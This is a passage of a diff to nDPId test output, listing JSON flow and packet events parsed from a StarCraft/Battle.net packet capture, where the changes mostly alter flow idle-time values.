{"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/live-event?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1437389985376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985376,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcQgMkzhJxiSeGASOQhdQAAAAgQFtAAA"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1437389985376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985376,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEapAAIAGHBDAqAFkUO+6Gg3EAFAnGJJ4IDJM4lAQ+vCzFAAA"} -00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985320,"flow_last_seen":1437389985385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/homepage?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985434,"flow_last_seen":1437389985434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985434,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1437389985434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985434,"pkt":"hCYVPnXEIImEa8W6CABFAAA0AOhAAIAGLLjAqAFkUO+6KA3FAFDb6m0AAAAAAIACIAAq7AAAAgQFtAEDAwgBAQQC"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985446,"flow_last_seen":1437389985446,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985446,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1437389985446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985446,"pkt":"hCYVPnXEIImEa8W6CABFAAA0AOlAAIAGLLfAqAFkUO+6KA3GAFDf523sAAAAAIACIAAmAgAAAgQFtAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1437389985486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985486,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGeqhQ77oowKgBZABQDcUKff272+ptAWASOQgysAAAAgQFtAAA"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1437389985486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985486,"pkt":"hCYVPnXEIImEa8W6CABFAAAoAOxAAIAGLMDAqAFkUO+6KA3FAFDb6m0BCn39vFAQ+vCIhAAA"} -00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985434,"flow_last_seen":1437389985495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437389985495,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/live-events.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1437389985499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985499,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGeqhQ77oowKgBZABQDcb00A3Z3+dt7WASOQgzVQAAAgQFtAAA"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1437389985499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985499,"pkt":"hCYVPnXEIImEa8W6CABFAAAoAO5AAIAGLL7AqAFkUO+6KA3GAFDf523t9NAN2lAQ+vCJKQAA"} -00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985446,"flow_last_seen":1437389985508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437389985508,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/client-homepage.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389983663,"flow_last_seen":1437389983663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389983663,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1437389983663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389983663,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EZpAAIAGHBTAqAFkUO+6Gg3BAFD6MpY\/AAAAAIACIADjdgAAAgQFtAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1437389983723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389983723,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcFck85k+jKWQGASOQjIewAAAgQFtAAA"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1437389983723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389983723,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEZtAAIAGHB\/AqAFkUO+6Gg3BAFD6MpZAXJPOZVAQ+vAeUAAA"} +00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983663,"flow_last_seen":1437389983723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389983723,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389983788,"flow_last_seen":1437389983788,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389983788,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1437389983788,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389983788,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RFRAAIAG6V7AqAFkUO+6FQ3CAFAtDsyVAAAAAIACIAB6SQAAAgQFtAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1437389983846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389983846,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDcLXOt3ELQ7MlmASOQjVRgAAAgQFtAAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1437389983846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389983846,"pkt":"hCYVPnXEIImEa8W6CABFAAAoRFZAAIAG6WjAqAFkUO+6FQ3CAFAtDsyW1zrdxVAQ+vArGwAA"} +00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983788,"flow_last_seen":1437389983846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1437389983846,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985308,"flow_last_seen":1437389985308,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985308,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1437389985308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985308,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EaZAAIAGHAjAqAFkUO+6Gg3DAFAjjlJ6AAAAAIACIAD93gAAAgQFtAEDAwgBAQQC"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985320,"flow_last_seen":1437389985320,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985320,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1437389985320,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985320,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EadAAIAGHAfAqAFkUO+6Gg3EAFAnGJJ3AAAAAIACIAC6VgAAAgQFtAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1437389985363,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985363,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcNyhhfoI45Se2ASOQiDbQAAAgQFtAAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1437389985363,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985363,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEahAAIAGHBLAqAFkUO+6Gg3DAFAjjlJ7coYX6VAQ+vDZQQAA"} +00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985308,"flow_last_seen":1437389985373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985373,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/live-event?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1437389985376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985376,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcQgMkzhJxiSeGASOQhdQAAAAgQFtAAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1437389985376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985376,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEapAAIAGHBDAqAFkUO+6Gg3EAFAnGJJ4IDJM4lAQ+vCzFAAA"} +00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985320,"flow_last_seen":1437389985385,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/homepage?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985434,"flow_last_seen":1437389985434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985434,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1437389985434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985434,"pkt":"hCYVPnXEIImEa8W6CABFAAA0AOhAAIAGLLjAqAFkUO+6KA3FAFDb6m0AAAAAAIACIAAq7AAAAgQFtAEDAwgBAQQC"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985446,"flow_last_seen":1437389985446,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985446,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1437389985446,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985446,"pkt":"hCYVPnXEIImEa8W6CABFAAA0AOlAAIAGLLfAqAFkUO+6KA3GAFDf523sAAAAAIACIAAmAgAAAgQFtAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1437389985486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985486,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGeqhQ77oowKgBZABQDcUKff272+ptAWASOQgysAAAAgQFtAAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1437389985486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985486,"pkt":"hCYVPnXEIImEa8W6CABFAAAoAOxAAIAGLMDAqAFkUO+6KA3FAFDb6m0BCn39vFAQ+vCIhAAA"} +00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985434,"flow_last_seen":1437389985495,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437389985495,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/live-events.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1437389985499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985499,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGeqhQ77oowKgBZABQDcb00A3Z3+dt7WASOQgzVQAAAgQFtAAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1437389985499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985499,"pkt":"hCYVPnXEIImEa8W6CABFAAAoAO5AAIAGLL7AqAFkUO+6KA3GAFDf523t9NAN2lAQ+vCJKQAA"} +00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985446,"flow_last_seen":1437389985508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437389985508,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/client-homepage.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985821,"flow_last_seen":1437389985821,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1437389985821,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1437389985821,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1437389985821,"pkt":"hCYVPnXEIImEa8W6CABFAABGX2kAAIARVovAqAFkwKgB\/tisADUAMndemisBAAABAAAAAAAAC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAAAAQAB"} 